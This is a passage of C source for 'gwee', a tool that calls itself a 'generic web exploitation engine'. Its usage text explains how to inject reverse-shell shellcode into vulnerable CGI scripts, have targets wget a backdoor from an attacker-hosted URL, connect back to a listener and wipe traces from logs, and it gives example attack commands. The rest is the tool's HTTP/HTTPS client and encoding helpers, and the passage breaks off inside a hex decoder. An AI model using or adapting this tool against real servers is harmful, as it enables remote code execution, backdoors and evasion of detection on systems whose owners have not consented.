"-z string\n"
"   String to append after the shellcode injection command. By default, the -z\n"
"   string is empty. An example usage of the -y -z option combo would be:\n"
"\n"
"   $ gwee -H -y '?testvar=' -z '|' target/cgi-bin/test.cgi\n"
"\n"
"   This will resolve into:\n"
"   http://target/cgi-bin/test.cgi?testvar=perl -e \"print <shellcode>\"|\n"
"   Of course, you could have done it this way too, same result:\n"
"   $ gwee -z '|' 'target/cgi-bin/test.cgi?testvar='\n"
"\n"
"   $ gwee -y testvar= -z '|' target/cgi-bin/test.cgi\n"
"   This will resolve into:\n"
"   http://target/cgi-bin/test.cgi\n"
"   POST data: testvar=perl -e \"print <shellcode>\"|\n"
"-G\n"
"   Use HTTP GET instead of POST. This is not recommended since nasty long\n"
"   tell-tail strings will end up in the access_log. In order for the whole\n"
"   payload to fit into a 1024 byte GET request, the shellcode is split up into\n"
"   4 separate requests, all producing nasty logs.\n"
"-H\n"
"   Use HTTP HEAD instead of POST/GET. Read about -G, the same nasty logs will\n"
"   appear on the target and the shellcode will be split into 4 requests.\n"
"-l your_ip_or_hostname\n"
"   The IP or hostname to have the shellcode connect back to. Hostnames will\n"
"   be resolved into IP numbers, since that's the only method used by the\n"
"   binary shellcodes.\n"
"-p port\n"
"   The port to connect back to, default is 31337.\n"
"-s #\n"
"   Choose which shellcode to install on the target:\n"
"       0 = Sabu's Perl shellcode (default if -s is omitted)\n"
"       1 = Linux x86 binary\n"
"       2 = FreeBSD x86 binary\n"
"       3 = NetBSD x86 binary\n"
"       4 = Sabu's Python shellcode (the target must have Python installed)\n"
"-i #\n"
"   Choose shellcode injection method:\n"
"       0 = perl -e \"print \\\"<hex>\\\"\" (default if -i is omitted)\n"
"       1 = python -c \"__import__(\\\"sys\\\").stdout.write(\\\"<hex>\\\")\"\n"
"       2 = printf \"<hex>\"\n"
"       3 = echo -ne \"<hex>\" (works only if target's /bin/sh is bash)\n"
"-I prefix_path\n"
"   Choose a prefix to the shellcode injection method, e.g.:\n"
"   -i1 -I /usr/local/bin/\n"
"   that would parse it into: /usr/local/bin/python -c ...\n"
"   default is empty (the preferred way).\n"
"-T %s\n"
"   Choose a different temporary filename for the shellcode/backdoor on the\n"
"   target than the default.\n"
"-a \"user agent string\"\n"
"   Choose user agent string, e.g.:\n"
"       -a \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\"\n"
"   If -a is omitted, I'll randomize from %u real user-agent strings.\n"
"-v\n"
"   Be really verbose, disclose exactly which commands are being executed.\n"
"-q\n"
"   Be really silent, only output error messages, nothing else.\n"
"-L\n"
"   Run built-in tcp listener (no need to use \"nc -l\").\n"
"-A\n"
"   Only listen for incoming connection on -p port, nothing else. Time-out is\n"
"   set to no time-out, which can be changed by appending, e.g., -t30 *after*\n"
"   the -A (not before). The -A option is just like: nc -l -p port -w timeout\n"
"-t seconds\n"
"   Time-out in seconds until listener (-L) times out. Default is -t30\n"
"   (30 seconds), -t0 means no time-out.\n"
"-f\n"
"   Simply non-interactive, you don't need to press return to proceed.\n"
"-w http://home.of.attacker/reverse_shellcode\n"
"   If you specify the -w option, the injection methods won't be used. Instead\n"
"   \"wget -Yoff -q -O <bd> <url>\" will be executed on the target to download a\n"
"   reverse shellcode/backdoor that will consequently be execute as per usual.\n"
"   Use the -d option to dump a shellcode that you can upload somewhere.\n"
"-d outfile\n"
"   This option will dump shellcode instead of injecting it somewhere. You use\n"
"   the -l -p and -s options as usual, but instead of connecting somewhere,\n"
"   the generated shellcode will be dumped to a file you specify after the -d.\n"
"   Upload this file to a webserver and use it's URL with the -w option.\n"
"   For example, this command will dump x86 Linux sishell:\n"
"   $ gwee -lyourhostname. -p1337 -s1 -d bd\n"
"   $ scp bd leet@host:/wwwroot/\n"
"   $ gwee -w http://host/bd -LG -p1337 'target/cgi-bin/vuln.cgi?'\n"
"-P\n"
"   Preserve the shellcode after injection. Normally, the exploit will send a\n"
"   HTTP POST, HEAD or GET request trying to execute \"rm -f %s\"\n"
"   This will leave nasty logs even after you wipe yourself from the logs. If\n"
"   you know you'll get a shell on a box, use the -P option with the -L option.\n"
"   Once connected with -L, it'll automatically send a \"shred -fu ; rm -f\"\n"
"   over the connected socket.\n"
"-r\n"
"   Remove created backdoor file (shellcode) on the target. This is done\n"
"   by default, but you still have the choice to explicitly do a remove.\n"
"\n"
"Examples:\n"
"gwee -y 'q=%%3B' -l fubar.org. -p 6666 -L https://target/cgi-bin/vuln.cgi\n"
"gwee -y'?cmd=' -z'|' -G -l mydom.tld -p 9000 -s1 -i3 -Lf target/vuln.pl\n"
"gwee -y'loginname=%%3B' -l mydom.tld -p80 -Lf https://target/userstat.pl\n"
"gwee -A -p 6666 -t0 -q\n",
           get_revision(rcsid), rcsid, TMPFILE, number_of_agents, TMPFILE);

    #if ! defined(WITH_SSL)
        printf("\nThis gwee is NOT compiled with HTTPS support (OpenSSL). Add\n"
               "\"-DWITH_SSL -lssl -lcrypto\" to your compilation options.\n");
    #endif
    exit(1);
}


void print_banner(void) {

  #ifdef WIN32
    printf("\n"
           "        !!!\n"
           "     `  ___  '        gwee for win32\n"
           "    -  (0 0)  -\n"
           "-----oOo(_)oOo---------------------------------------- ----- --- -- -  -\n"
           "gwee %s - generic web exploitation engine\n"
           "Copyright (C) 2004 Michel Blomgren <michel@cycom.se>\n"
           "Perl and Python shellcode by Sabu -> http://sabu.net\n"
           "Acknowledgements: Sabu and Nullbyte\n"
           "\n", get_revision(rcsid));
  #else
    printf("\n"
           "\033[0;35m        !!!\033[0m\n"
           "\033[0;35m     `  \033[1;37m___\033[0;35m  '\033[0m\n"
           "\033[0;35m    -  \033[1;37m(0 0)\033[0;35m  -\033[0m\n"
           "\033[1;30m-----\033[1;37moOo(_)oOo\033[1;30m---------------------------------------- ----- --- -- -  -\033[0m\n"
           "\033[0;31mgwee %s\033[1;30m - generic web exploitation engine\033[0m\n"
           "\033[1;30m\033[0;33mCopyright (C) 2004 Michel Blomgren\033[1;30m <michel@cycom.se>\033[0m\n"
           "\033[1;30m\033[0;33mPerl and Python shellcode by Sabu\033[1;30m (http://sabu.net)\033[0m\n"
           "\033[1;30mAcknowledgements: Sabu and Nullbyte\033[0m\n"
           "\n", get_revision(rcsid));
  #endif
    return;
};

void print_banner_without_colors(void) {
    printf("gwee %s - generic web exploitation engine\n"
           "Copyright (C) 2004 Michel Blomgren <michel@cycom.se>\n"
           "Perl and Python shellcode and expertise by Sabu -> http://sabu.net\n"
           "%s\n", get_revision(rcsid), rcsid);
    return;
};



#ifdef WIN32
/* very basic wsastrerror() */
char *WSAstrerror(DWORD my_wsagetlasterror) {
    switch (my_wsagetlasterror) {
        case WSABASEERR:
            return "WSABASEERR";
        case WSAEINTR:
            return "WSAEINTR";
        case WSAEBADF:
            return "WSAEBADF";
        case WSAEACCES:
            return "WSAEACCES";
        case WSAEFAULT:
            return "WSAEFAULT";
        case WSAEINVAL:
            return "WSAEINVAL";
        case WSAEMFILE:
            return "WSAEMFILE";
        case WSAEWOULDBLOCK:
            return "WSAEWOULDBLOCK";
        case WSAEINPROGRESS:
            return "WSAEINPROGRESS";
        case WSAEALREADY:
            return "WSAEALREADY";
        case WSAENOTSOCK:
            return "WSAENOTSOCK";
        case WSAEDESTADDRREQ:
            return "WSAEDESTADDRREQ";
        case WSAEMSGSIZE:
            return "WSAEMSGSIZE";
        case WSAEPROTOTYPE:
            return "WSAEPROTOTYPE";
        case WSAENOPROTOOPT:
            return "WSAENOPROTOOPT";
        case WSAEPROTONOSUPPORT:
            return "WSAEPROTONOSUPPORT";
        case WSAESOCKTNOSUPPORT:
            return "WSAESOCKTNOSUPPORT";
        case WSAEOPNOTSUPP:
            return "WSAEOPNOTSUPP";
        case WSAEPFNOSUPPORT:
            return "WSAEPFNOSUPPORT";
        case WSAEAFNOSUPPORT:
            return "WSAEAFNOSUPPORT";
        case WSAEADDRINUSE:
            return "WSAEADDRINUSE";
        case WSAEADDRNOTAVAIL:
            return "WSAEADDRNOTAVAIL";
        case WSAENETDOWN:
            return "WSAENETDOWN";
        case WSAENETUNREACH:
            return "WSAENETUNREACH";
        case WSAENETRESET:
            return "WSAENETRESET";
        case WSAECONNABORTED:
            return "WSAECONNABORTED";
        case WSAECONNRESET:
            return "WSAECONNRESET";
        case WSAENOBUFS:
            return "WSAENOBUFS";
        case WSAEISCONN:
            return "WSAEISCONN";
        case WSAENOTCONN:
            return "WSAENOTCONN";
        case WSAESHUTDOWN:
            return "WSAESHUTDOWN";
        case WSAETOOMANYREFS:
            return "WSAETOOMANYREFS";
        case WSAETIMEDOUT:
            return "WSAETIMEDOUT";
        case WSAECONNREFUSED:
            return "WSAECONNREFUSED";
        case WSAELOOP:
            return "WSAELOOP";
        case WSAENAMETOOLONG:
            return "WSAENAMETOOLONG";
        case WSAEHOSTDOWN:
            return "WSAEHOSTDOWN";
        case WSAEHOSTUNREACH:
            return "WSAEHOSTUNREACH";
        case WSAENOTEMPTY:
            return "WSAENOTEMPTY";
        case WSAEPROCLIM:
            return "WSAEPROCLIM";
        case WSAEUSERS:
            return "WSAEUSERS";
        case WSAEDQUOT:
            return "WSAEDQUOT";
        case WSAESTALE:
            return "WSAESTALE";
        case WSAEREMOTE:
            return "WSAEREMOTE";
        case WSAEDISCON:
            return "WSAEDISCON";
        case WSASYSNOTREADY:
            return "WSASYSNOTREADY";
        case WSAVERNOTSUPPORTED:
            return "WSAVERNOTSUPPORTED";
        case WSANOTINITIALISED:
            return "WSANOTINITIALISED";
        case WSAHOST_NOT_FOUND:
            return "WSAHOST_NOT_FOUND";
        case WSATRY_AGAIN:
            return "WSATRY_AGAIN";
        case WSANO_RECOVERY:
            return "WSANO_RECOVERY";
        case WSANO_DATA:
            return "WSANO_DATA";
        default:
    	    return "Unknown winsock error";
    }
}
/*
 * init_winsock() initializes wsock32.dll (under win32 that is)
 */
void init_winsock(void) {
    WORD wVersionRequested;
    static WSADATA wsaData;
    float socklib_ver;

    wVersionRequested = MAKEWORD(1,1);
    if (WSAStartup(wVersionRequested, &wsaData)) {
        fprintf(stderr, "[?] WSAStartup: %s\n", WSAstrerror(WSAGetLastError()));
        exit(1);
    }
    /* check if winsock DLL supports 1.1 (or higher) */
    socklib_ver = HIBYTE(wsaData.wVersion) / 10.0;
    socklib_ver += LOBYTE(wsaData.wVersion);
    if (socklib_ver < 1.1) {
        fprintf(stderr, "[?] socket library must support 1.1 or higher\n");
        WSACleanup();
        exit(1);
    }
    return;
}
#endif


/*
 * mini-wwwclient
 */

/* how long time in seconds select may block before bumping out */
#define httpclient_recv_timeout         3

#define httpclient_err_empty_url        1
#define httpclient_err_empty_method     2
#define httpclient_err_empty_useragent  3
#define httpclient_err_empty_data       4
#define httpclient_err_no_auth          5
#define httpclient_err_bad_url          6
#define httpclient_err_bad_method       7
#define httpclient_get                  8
#define httpclient_post                 9
#define httpclient_head                 10
#define httpclient_http                 11
#define httpclient_https                12

int httpclient(char *method, char *xUrl, char *useragent, char *data, int issilent) {
/*
 * tiny http client
 * method is either "GET", "POST" or "HEAD"
 * xUrl is the URL (null-terminated)
 * useragent is a valid User-Agent string
 * data is a null-terminated string of data for POST requests only
 */
    char xbuf[4096];
    char slash[] = "/";
    char protocolstr[] = "://";
    char protocol1[] = "http:";
#if defined(WITH_SSL)
    char protocol2[] = "https:";
#endif

#ifdef WIN32
    SOCKET sd;
#else
    int sd;
#endif

    int sopt, a, type;

#if defined(WITH_SSL)
    int protocol = httpclient_http;
#endif
    struct sockaddr_in servAddr;
    struct sockaddr_in connectAddr;
    struct hostent *Xhe;

    char *hcHostname;
    char *hcPort_ascii;
    unsigned int hcPort = 80;

    char *request;
    char *tempp;


    if (verbose && !issilent) {
        printf("[i] httpclient(\"%s\", \"%s\", \"%s\", \"%s\", %u);\n",
        method, xUrl, useragent, data, issilent);
    }


    /* do some usage checking first */
    if (!xUrl) {
        if (!issilent)
            fprintf(stderr, "[?] url can't be empty\n");
        #ifdef WIN32
            WSACleanup();
        #endif
        exit(1);
        //return httpclient_err_empty_url;
    }
    if (!method) {
        if (!issilent)
            fprintf(stderr, "[?] null method specified, must be either GET, HEAD or POST\n");
        #ifdef WIN32
            WSACleanup();
        #endif
        exit(1);
        //return httpclient_err_empty_method;
    }
    if (!useragent) {
        if (!issilent)
            fprintf(stderr, "[?] null user-agent specified\n");
        #ifdef WIN32
            WSACleanup();
        #endif
        exit(1);
        //return httpclient_err_empty_useragent;
    }

    /* url can't be empty */
    if (!strlen(xUrl)) {
        if (!issilent)
            fprintf(stderr, "[?] url can't be empty\n");
        #ifdef WIN32
            WSACleanup();
        #endif
        exit(1);
        //return httpclient_err_empty_url;
    }

    /* figure out method to use */
    if (!strcasecmp(method, "GET")) {
        type = httpclient_get;
    } else if (!strcasecmp(method, "POST")) {
        type = httpclient_post;
        if (!data) {
            if (!issilent)
                fprintf(stderr, "[?] POST method specified, but no data to post\n");
            #ifdef WIN32
                WSACleanup();
            #endif
            exit(1);
            //return httpclient_err_empty_data;
        }
    } else if (!strcasecmp(method, "HEAD")) {
        type = httpclient_head;
    } else {
        if (!issilent)
            fprintf(stderr, "[?] method %s not recognized\n", method);
        #ifdef WIN32
            WSACleanup();
        #endif
        exit(1);
        //return httpclient_err_bad_method;
    }

    /* make sure we don't have an @ in the url */
    a = 0;
    while (xUrl[a]) {
        if (xUrl[a] == '@') {
            if (!issilent)
                fprintf(stderr, "[?] url can't contain \"@\", I can't handle AUTH (yet)\n");
            #ifdef WIN32
                WSACleanup();
            #endif
            exit(1);
            //return httpclient_err_no_auth;
        }
        a++;
    }

    if (!(tempp = strstr(xUrl, protocolstr))) {
        tempp = xUrl;
    } else {
        #if defined WITH_SSL
            if (!strncasecmp(xUrl, protocol1, strlen(protocol1))) {
                protocol = httpclient_http;
            } else if (!strncasecmp(xUrl, protocol2, strlen(protocol2))) {
                protocol = httpclient_https;
                /*
                 * changing hcPort here is safe, if another port is specified
                 * (after ':') it's changed further ahead
                 */
                hcPort = 443;
            } else {
                if (!issilent)
                    fprintf(stderr, "[?] HTTP and HTTPS are the only supported protocols!\n");
                #ifdef WIN32
                    WSACleanup();
                #endif
                exit(1);
                //return httpclient_err_bad_url;
            }
        #else
            if (strncasecmp(xUrl, protocol1, strlen(protocol1))) {
                if (!issilent)
                    fprintf(stderr, "[?] this gwee is only compiled with HTTP support, no other protocol!\n");
                #ifdef WIN32
                    WSACleanup();
                #endif
                exit(1);
                //return httpclient_err_bad_url;
            }
        #endif
        tempp += strlen(protocolstr);
    }

    if (!isalnum(tempp[0])) {
        if (!issilent)
            fprintf(stderr, "[?] bad url\n");
        #ifdef WIN32
            WSACleanup();
        #endif
        exit(1);
        //return httpclient_err_bad_url;
    }

    /*
     * extract hostname part of URL
     */
    a = 0;
    while (tempp[a]) {
        if ((!isalnum(tempp[a])) && (tempp[a] != '.') && (tempp[a] != '-') && (tempp[a] != '_'))
            break;
        a++;
    }

    /* allocate special buffer for hostname (hcHostname) */
    if (!(hcHostname = malloc(a+1))) {
        if (!issilent)
            fprintf(stderr, "[?] can't allocate memory: %s\n", strerror(errno));
        #ifdef WIN32
            WSACleanup();
        #endif
        exit(1);
        //return -1;
    }
    strncpy(hcHostname, tempp, a);
    hcHostname[a] = 0;

    if (!strlen(hcHostname)) {
        if (!issilent)
            fprintf(stderr, "[?] host part in URL is empty\n");
        #ifdef WIN32
            WSACleanup();
        #endif
        exit(1);
        //return httpclient_err_bad_url;
    }

    tempp = &tempp[a];

    a = 0;
    if (tempp[a] == ':') {
        /* IMPORTANT! a == 1 initially, not 0, very important! */
        a++;

        while (isdigit(tempp[a])) {
            a++;
        }
        if (!(hcPort_ascii = malloc(a))) {  /* a is already strlen+1 */
            if (!issilent)
                fprintf(stderr, "[?] can't allocate memory: %s", strerror(errno));
            #ifdef WIN32
                WSACleanup();
            #endif
            exit(1);
            //return -1;
        }
        strncpy(hcPort_ascii, tempp+1, a-1);
        hcPort_ascii[a-1] = 0;

        hcPort = atoi(hcPort_ascii);

        if ((hcPort < 1) || (hcPort > 65535)) {
            fprintf(stderr, "[?] port in URL is not within the range 1-65535\n");
            #ifdef WIN32
                WSACleanup();
            #endif
            exit(1);
            //return -1;
        }
    }

    request = &tempp[a];

    if (!strlen(request)) {
        request = slash;
    }

    /*
     * connect
     */

    if (!(Xhe = gethostbyname(hcHostname))) {
        if (!issilent) {
            fprintf(stderr, "[?] %s: %s\n", hcHostname,
            #ifdef WIN32
            WSAstrerror(WSAGetLastError())
            #else
            hstrerror(h_errno)
            #endif
            );
        }

        #ifdef WIN32
            WSACleanup();
        #endif
        exit(1);
        //return -1;
    }

    servAddr.sin_family = Xhe->h_addrtype;
    memcpy(&servAddr.sin_addr.s_addr, Xhe->h_addr_list[0], Xhe->h_length);
    servAddr.sin_port = htons((short)hcPort);

    #ifdef WIN32
        if ((sd = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) {
    #else
        if ((sd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
    #endif
        if (!issilent)
            fprintf(stderr, "[?] socket(): %s\n",
            #ifdef WIN32
            WSAstrerror(WSAGetLastError())
            #else
            strerror(errno)
            #endif
            );
        #ifdef WIN32
            WSACleanup();
        #endif
        exit(1);
        //return -1;
    }


    /* if source port > 0, then we use bind() to choose a user-specified source port */
    if (sourceport) {
        if ((sourceport < 1) || (sourceport > 65535)) {
            if (!issilent) {
                fprintf(stderr, "[?] source port is not in the range 1-65535!\n");
            }
            #ifdef WIN32
                WSACleanup();
            #endif
            exit(1);
            //return -1;
        }

        sopt = 1;
        connectAddr.sin_family = AF_INET;
        connectAddr.sin_addr.s_addr = htonl(INADDR_ANY);
        connectAddr.sin_port = htons(sourceport);

        /* set REUSEADDR socket option */
        #ifdef WIN32
          if (setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char*)&sopt, sizeof(sopt))) {
        #else
          if (setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (void*)&sopt, sizeof(sopt))) {
        #endif
            if (!issilent) {
                fprintf(stderr, "[?] setsockopt(): %s\n", strerror(errno));
            }
            #ifdef WIN32
                WSACleanup();
            #endif
            exit(1);
            //return -1;
        }

        /* bind to custom source port */
        if (bind(sd, (struct sockaddr*)&connectAddr, sizeof(connectAddr))) {
            if (!issilent) {
                fprintf(stderr, "[?] bind() to port %i: %s\n", sourceport,
                #ifdef WIN32
                WSAstrerror(WSAGetLastError())
                #else
                strerror(errno)
                #endif
                );
            }
            #ifdef WIN32
                WSACleanup();
            #endif
            exit(1);
            //return -1;
        }
    }


    if ((!issilent) && verbose) {
        printf("[i] connecting to %s (%s) on port %u\n", hcHostname, inet_ntoa(*((struct in_addr*)Xhe->h_addr_list[0])), hcPort);
    }

    if (connect(sd, (struct sockaddr *)&servAddr, sizeof(servAddr)) < 0) {
        if (!issilent)
            fprintf(stderr, "[?] connect() to %s:%u: %s\n", inet_ntoa(*((struct in_addr*)Xhe->h_addr_list[0])), hcPort,
            #ifdef WIN32
            WSAstrerror(WSAGetLastError())
            #else
            strerror(errno)
            #endif
            );
        #ifdef WIN32
            WSACleanup();
        #endif
        exit(1);
        //return -1;
    }

    #if defined(WITH_SSL)
        if (protocol == httpclient_https) {
            /**** we're connected, start ssl negotiation ****/

            if (!(ssl = SSL_new(sslctx))) {
                if (!issilent) {
                    fprintf(stderr, "[?] SSL_new(): %s\n", ERR_reason_error_string(ERR_get_error()));
                }
                #ifdef WIN32
                    closesocket(sd);
                    WSACleanup();
                #else
                    close(sd);
                #endif
                exit(1);
                //return -1;
            }
            if (!SSL_set_fd(ssl, sd)) {
                if (!issilent) {
                    fprintf(stderr, "[?] SSL_set_fd(): %s\n", ERR_reason_error_string(ERR_get_error()));
                }
                #ifdef WIN32
                    closesocket(sd);
                #else
                    close(sd);
                #endif
                SSL_free(ssl);
                #ifdef WIN32
                    WSACleanup();
                #endif
                exit(1);
                //return -1;
            }
            if (SSL_connect(ssl) <= 0) {
                if (!issilent) {
                    fprintf(stderr, "[?] SSL_connect(): %s\n", ERR_reason_error_string(ERR_get_error()));
                }
                #ifdef WIN32
                    closesocket(sd);
                #else
                    close(sd);
                #endif
                SSL_free(ssl);
                #ifdef WIN32
                    WSACleanup();
                #endif
                exit(1);
                //return -1;
            }

            if ((!issilent) && verbose) {
                printf("[i] ssl connection using cipher %s\n", SSL_get_cipher(ssl));
            }

            /**** get server certificate ****/

            if (!(peer_cert = SSL_get_peer_certificate(ssl))) {
                if (!issilent) {
                    fprintf(stderr, "[?] %s:%u (%s) did not present a certificate!\n",
                        hcHostname, hcPort, inet_ntoa(*((struct in_addr*)Xhe->h_addr_list[0])));
                }
                SSL_shutdown(ssl);
                #ifdef WIN32
                    closesocket(sd);
                #else
                    close(sd);
                #endif
                SSL_free(ssl);
                #ifdef WIN32
                    WSACleanup();
                #endif
                exit(1);
                //return -1;
            }

            /**** print certificate information ****/

            if ((!issilent) && verbose) {
                unsigned int mdsha_size;
                unsigned char mdsha[EVP_MAX_MD_SIZE];

                printf("[i] target certificate information:\n");
                printf("... subject: %s\n", X509_NAME_oneline(X509_get_subject_name(peer_cert), 0, 0));
                printf("... issuer: %s\n", X509_NAME_oneline(X509_get_issuer_name(peer_cert), 0, 0));

                if (!X509_digest(peer_cert, EVP_md5(), mdsha, &mdsha_size)) {
                    if (!issilent) {
                        fprintf(stderr, "[?] X509_digest\n");
                    }
                    X509_free(peer_cert);
                    SSL_shutdown(ssl);
                    #ifdef WIN32
                        closesocket(sd);
                    #else
                        close(sd);
                    #endif
                    SSL_free(ssl);
                    #ifdef WIN32
                        WSACleanup();
                    #endif
                    exit(1);
                    //return -1;
                }
            }

            /* free peer_cert allocated by SSL_get_peer_certificate() above */
            X509_free(peer_cert);

            /**** end of SSL negotiation ****/
        }
    #endif


    /*
     * send request
     */

    if (type == httpclient_get) {
        snprintf(xbuf, sizeof(xbuf),
            "GET %s HTTP/1.1\r\n"
            "User-Agent: %s\r\n",
            request, useragent);
        if (hcPort == 80) {
            snprintf(&xbuf[strlen(xbuf)], (sizeof(xbuf)-strlen(xbuf)),
                "Host: %s\r\n", hcHostname);
        } else {
            snprintf(&xbuf[strlen(xbuf)], (sizeof(xbuf)-strlen(xbuf)),
                "Host: %s:%u\r\n", hcHostname, hcPort);
        }
        snprintf(&xbuf[strlen(xbuf)], (sizeof(xbuf)-strlen(xbuf)),
            "Pragma: no-cache\r\n"
            "Connection: close\r\n"
            "\r\n");
    } else if (type == httpclient_post) {
        snprintf(xbuf, sizeof(xbuf),
            "POST %s HTTP/1.1\r\n"
            "User-Agent: %s\r\n",
            request, useragent);
        if (hcPort == 80) {
            snprintf(&xbuf[strlen(xbuf)], (sizeof(xbuf)-strlen(xbuf)),
                "Host: %s\r\n", hcHostname);
        } else {
            snprintf(&xbuf[strlen(xbuf)], (sizeof(xbuf)-strlen(xbuf)),
                "Host: %s:%u\r\n", hcHostname, hcPort);
        }
        snprintf(&xbuf[strlen(xbuf)], (sizeof(xbuf)-strlen(xbuf)),
            "Pragma: no-cache\r\n"
            "Connection: close\r\n"
            "Content-Length: %u\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            "\r\n",
            strlen(data));
    } else if (type == httpclient_head) {
        snprintf(xbuf, sizeof(xbuf),
            "HEAD %s HTTP/1.1\r\n"
            "User-Agent: %s\r\n",
            request, useragent);
        if (hcPort == 80) {
            snprintf(&xbuf[strlen(xbuf)], (sizeof(xbuf)-strlen(xbuf)),
                "Host: %s\r\n", hcHostname);
        } else {
            snprintf(&xbuf[strlen(xbuf)], (sizeof(xbuf)-strlen(xbuf)),
                "Host: %s:%u\r\n", hcHostname, hcPort);
        }
        snprintf(&xbuf[strlen(xbuf)], (sizeof(xbuf)-strlen(xbuf)),
            "Pragma: no-cache\r\n"
            "Connection: close\r\n"
            "\r\n");
    } else {
        #if defined WITH_SSL
            if (protocol == httpclient_https) {
                SSL_shutdown(ssl);
                #ifdef WIN32
                    closesocket(sd);
                #else
                    close(sd);
                #endif
                SSL_free(ssl);
            } else {
                #ifdef WIN32
                    closesocket(sd);
                #else
                    close(sd);
                #endif
            }
        #else
            #ifdef WIN32
                closesocket(sd);
            #else
                close(sd);
            #endif
        #endif
        #ifdef WIN32
            WSACleanup();
        #endif
        exit(1);
        //return httpclient_err_bad_method;
    }


    #if defined(WITH_SSL)
        if (protocol == httpclient_https) {
            SSL_write(ssl, xbuf, strlen(xbuf));
            if (type == httpclient_post)
                SSL_write(ssl, data, strlen(data));
        } else {
            send(sd, xbuf, strlen(xbuf), 0);
            if (type == httpclient_post)
                send(sd, data, strlen(data), 0);
        }
    #else
        send(sd, xbuf, strlen(xbuf), 0);
        if (type == httpclient_post)
            send(sd, data, strlen(data), 0);
    #endif


    /*
     * Apache kills (or something similar) the child process if the HEAD
     * transfer is too fast (i.e. finishes faster than the script can
     * execute). Because of this, we usleep() some, so that the HEAD request
     * is given a chance to do what we want. This may not apply to all
     * versions of Apache, though.
     */
    if (type == httpclient_head) {
        #ifdef WIN32
            Sleep(100);
        #else
            usleep(100000);
        #endif
    }


    while (1) {
        fd_set fds;
        struct timeval to;
        to.tv_sec = httpclient_recv_timeout;
        to.tv_usec = 0;

        FD_ZERO(&fds);
        FD_SET(sd, &fds);

      #ifdef WIN32
        if (select(FD_SETSIZE, &fds, NULL, NULL, &to) != SOCKET_ERROR) {
      #else
        if (select(FD_SETSIZE, &fds, NULL, NULL, &to) > 0) {
      #endif
            int cnt;
            if (FD_ISSET(sd, &fds)) {
                #if defined WITH_SSL
                    if (protocol == httpclient_https) {
                        if ((cnt = SSL_read(ssl, xbuf, sizeof(xbuf))) <= 0) {
                            int err;
                            err = SSL_get_error(ssl, cnt);
                            if (err == SSL_ERROR_WANT_READ)
                                continue;
                            else
                                break;
                        }
                    } else {
                        #ifdef WIN32
                        if ((cnt = recv(sd, xbuf, sizeof(xbuf), 0)) == SOCKET_ERROR) {
                            int wsaerr = WSAGetLastError();
                            if (wsaerr == WSAEWOULDBLOCK) { /* don't think this is used */
                                continue;
                            } else {
                                break;
                            }
                        } else if (cnt == 0) {
                            break;
                        }
                        #else
                        if ((cnt = recv(sd, xbuf, sizeof(xbuf), 0)) < 1) {
                            if ((cnt) && (errno == EWOULDBLOCK || errno == EAGAIN)) {
                                continue;
                            } else {
                                break;
                            }
                        }
                        #endif
                    }
                #else
                    #ifdef WIN32
                    if ((cnt = recv(sd, xbuf, sizeof(xbuf), 0)) == SOCKET_ERROR) {
                        int wsaerr = WSAGetLastError();
                        if (wsaerr == WSAEWOULDBLOCK) { /* don't think this is used */
                            continue;
                        } else {
                            break;
                        }
                    } else if (cnt == 0) {
                        break;
                    }
                    #else
                    if ((cnt = recv(sd, xbuf, sizeof(xbuf), 0)) < 1) {
                        if ((cnt) && (errno == EWOULDBLOCK || errno == EAGAIN)) {
                            continue;
                        } else {
                            break;
                        }
                    }
                    #endif
                #endif
                //write(STDOUT_FILENO, xbuf, cnt);
            }
        } else {
            break;
        }
    }

    #if defined WITH_SSL
        if (protocol == httpclient_https) {
            SSL_shutdown(ssl);
            close(sd);
            SSL_free(ssl);
        } else {
            #ifdef WIN32
                closesocket(sd);
            #else
                close(sd);
            #endif
        }
    #else
        #ifdef WIN32
            closesocket(sd);
        #else
            close(sd);
        #endif
    #endif

    return 0;
}
/*
 * end of mini-wwwclient
 */




char *percentencode(char *string) {
/*
 * url-encodes a string, for use in web environment, e.g.
 *
 * char *string is a null-terminated string to urlencode. percentencode() will
 * return a pointer to the url-encoded string (null-terminated), or NULL if
 * malloc() wouldn't allocate maximum space needed to url-encode the string.
 *
 * the pointer returned should be free()'d before calling percentencode()
 * again!
 *
 */
	unsigned int length, a, y, z;
	int x = 0;
	static char *memory;

	length = strlen(string);

	if (length) {
		if ((memory = malloc(length*3)) == NULL)
			return NULL;
	} else {
		if ((memory = malloc(1)) == NULL)
			return NULL;
		memory[0] = '\0';
		return memory;
	}

	for (a = 0; string[a] != 0; a++) {
		if (string[a] >= '0' && string[a] <= '9') {
			memory[x] = string[a]; x++;
			continue;
		} else if (string[a] >= 'A' && string[a] <= 'Z') {
			memory[x] = string[a]; x++;
			continue;
		} else if (string[a] >= 'a' && string[a] <= 'z') {
			memory[x] = string[a]; x++;
			continue;
		} else if (string[a] == '.' || string[a] == ',' || string[a] == '-' || string[a] == '_' || string[a] == '/') {
			memory[x] = string[a]; x++;
			continue;
		} else if (string[a] == ' ') {
			memory[x] = '+'; x++;
		} else {
		/* else urlencode it */

			memory[x] = '%'; x++;

			y = string[a];

			z = y;
			z &= 0xF0;
			z >>= 4;
			if (z >= 0 && z <= 9) {
				z += 0x30;
			} else {
				z -= 0x0A;
				z += 0x41;
			}
			memory[x] = z; x++;

			z = y;
			z &= 0x0F;
			if (z >= 0 && z <= 9) {
				z += 0x30;
			} else {
				z -= 0x0A;
				z += 0x41;
			}
			memory[x] = z; x++;

			continue;
		}
	}
	memory[x] = 0;
	return memory;
}



char *decodehex(char *input, FILE *fp) {
/*
 * ascii hex decoder
 * input *must only* consist of \x?? ascii hex, no other chars.
 * decodehex will return an allocated decoded string with the output.
 * output will also be written to a file pointer, if not null.
 */
    int a, x, y;
    char *decoded;

    if (!input)
        return NULL;

    if (strlen(input) < 4)
        return NULL;

    /* allocate some memory */
    x = (int)((strlen(input) / 4) + 16);
    if (!(decoded = (char*)malloc(x)))
        return NULL;

    a = 0;
    x = 0;
    while (input[a]) {
        if (input[a] != '\\')
            return NULL;

        /* get the "x" in \x?? */
        a++;
        if (!((input[a] == 'x') || (input[a] == 'X'))) {
            free(decoded);
            return NULL;
        }

        /* get the first ascii hex num (the first nibble) */
        a++;
        if ((input[a] >= '0') && (input[a] <= '9')) {
            y = (input[a] - '0') * 16;
